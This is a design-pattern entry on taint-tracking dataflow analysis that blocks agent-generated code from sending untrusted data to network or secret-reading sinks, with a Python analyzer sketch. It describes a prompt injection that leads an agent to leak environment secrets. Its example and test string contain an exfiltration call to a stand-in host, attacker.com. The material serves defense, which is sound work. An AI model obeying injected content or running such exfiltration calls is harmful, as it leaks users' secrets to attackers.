VIII · Safety & Control · Emerging

Code-Then-Execute with Dataflow Analysis

also known as Tainted-Value Code Execution, Sandbox-DSL with Provenance

Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.

Context

An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).

Problem

Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, the user's goal) from tainted values (fetched content that could be attacker-controlled). The same `exec(code)` call runs code built from both. A prompt injection in fetched content can produce code that, for example, reads secrets from the environment and embeds them in an outbound URL, and the sandbox cannot reject it because it cannot tell that the URL is tainted.

Forces

  • Free-form code generation is the agent's primary capability.
  • Static dataflow analysis on generated code constrains expressivity.
  • Tagging every value as trusted/tainted requires the DSL to track provenance.

Example

A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED, and the tag propagates through `summarize` to `summary`. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees a TAINTED value reach a network-egress sink and rejects the program before execution. Without the analysis, the sandbox would have allowed the egress because outbound HTTPS is permitted.
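The check in this example can be sketched with Python's standard `ast` module (Python 3.9+). This is a minimal illustration, not a production analyzer: the names `TAINT_SOURCES`, `SENSITIVE_SINKS`, and `check_program` are hypothetical, and the analysis only follows top-level assignments in straight-line code. A real implementation would also need to handle branches, loops, functions, and aliasing, and should reject anything it cannot analyze.

```python
import ast

# Hypothetical source and sink names, chosen to match the example above.
TAINT_SOURCES = {"fetch"}
SENSITIVE_SINKS = {"requests.get", "requests.post"}


def call_name(node: ast.Call) -> str:
    """Return the called expression as text, e.g. 'requests.get'."""
    return ast.unparse(node.func)


def is_tainted(expr: ast.AST, tainted: set[str]) -> bool:
    """Tainted if any sub-expression reads a tainted name or calls a source."""
    for node in ast.walk(expr):
        if isinstance(node, ast.Name) and node.id in tainted:
            return True
        if isinstance(node, ast.Call) and call_name(node) in TAINT_SOURCES:
            return True
    return False


def check_program(source: str) -> list[str]:
    """Return violations; an empty list means no tainted flow was found.

    The source is only parsed, never executed.
    """
    tainted: set[str] = set()
    violations: list[str] = []
    for stmt in ast.parse(source).body:
        # Flag any sensitive sink whose arguments carry taint.
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call) and call_name(node) in SENSITIVE_SINKS:
                args = list(node.args) + [kw.value for kw in node.keywords]
                if any(is_tainted(arg, tainted) for arg in args):
                    violations.append(
                        f"line {stmt.lineno}: tainted value reaches {call_name(node)}"
                    )
        # Propagate (or clear) taint through simple `name = expr` assignments.
        if isinstance(stmt, ast.Assign):
            value_tainted = is_tainted(stmt.value, tainted)
            for target in stmt.targets:
                if isinstance(target, ast.Name):
                    if value_tainted:
                        tainted.add(target.id)
                    else:
                        tainted.discard(target.id)
    return violations


PROGRAM = (
    "summary = summarize(fetch('https://example.com'))\n"
    "requests.get(f'https://attacker.com?d={summary}')\n"
)
print(check_program(PROGRAM))  # one violation, reported for line 2
```

Because `summary` is assigned from an expression that contains a call to `fetch`, it is marked tainted, and the f-string argument to `requests.get` inherits that taint. The URL `https://example.com` stands in for the elided one in the example.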

Solution

Therefore:

Define a sandbox DSL (subset of Python/TS or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside scratch dir), reject the program. Pair with sandbox-isolation, action-selector-pattern.
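One way to model the tags and the sink policy is sketched below. The pattern does not spell out how MIXED arises or how sinks treat it, so this sketch makes two assumptions: combining values with different tags yields MIXED, and sensitive sinks conservatively accept only TRUSTED values. The sink names and the `SINK_POLICY` table are hypothetical.

```python
from enum import Enum


class Tag(Enum):
    TRUSTED = "trusted"
    TAINTED = "tainted"
    MIXED = "mixed"


def join(a: Tag, b: Tag) -> Tag:
    """Tag of a value computed from inputs tagged `a` and `b`.

    Assumption: identical tags are preserved; any other combination is MIXED.
    """
    return a if a is b else Tag.MIXED


# Hypothetical policy table: the tags each sink accepts.
SINK_POLICY = {
    "network_egress": {Tag.TRUSTED},
    "env_read": {Tag.TRUSTED},
    "file_write_outside_scratch": {Tag.TRUSTED},
    "file_write_scratch": {Tag.TRUSTED, Tag.MIXED, Tag.TAINTED},
}


def allowed(sink: str, tag: Tag) -> bool:
    """Unknown sinks fail closed: no tag is accepted."""
    return tag in SINK_POLICY.get(sink, set())


url_tag = join(Tag.TRUSTED, Tag.TAINTED)   # trusted host + tainted query string
print(url_tag, allowed("network_egress", url_tag))
```

Keeping the policy in a table rather than in the analyzer makes the per-value enforcement auditable: adding a sink or relaxing a rule is a one-line change that can be reviewed on its own.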

What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.
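The rule above amounts to a single gate in front of the executor. The sketch below assumes the analyzer is a function that returns a list of violation messages and the executor is whatever sandboxed runner the system already has; `run_checked` and `ProgramRejected` are hypothetical names.

```python
from typing import Callable, List


class ProgramRejected(Exception):
    """Raised when analysis reports a tainted flow into a sensitive sink."""


def run_checked(
    source: str,
    analyze: Callable[[str], List[str]],
    execute: Callable[[str], object],
) -> object:
    """Run `source` only if `analyze` reports no violations.

    A failing program is rejected as a whole; nothing is stripped or
    rewritten to make it pass.
    """
    violations = analyze(source)
    if violations:
        raise ProgramRejected("; ".join(violations))
    return execute(source)
```

Routing every execution through one such function makes the invariant easy to audit: the executor is never called with a program the analyzer has not seen.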

And the patterns that stand alongside it, or against it —

  • complements · Sandbox Isolation ★★ · Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
  • complements · Code-as-Action Agent · Have the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
  • complements · Code Execution ★★ · Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
  • complements · Action Selector Pattern · Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
  • complements · Tool Output Poisoning Defense · Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.
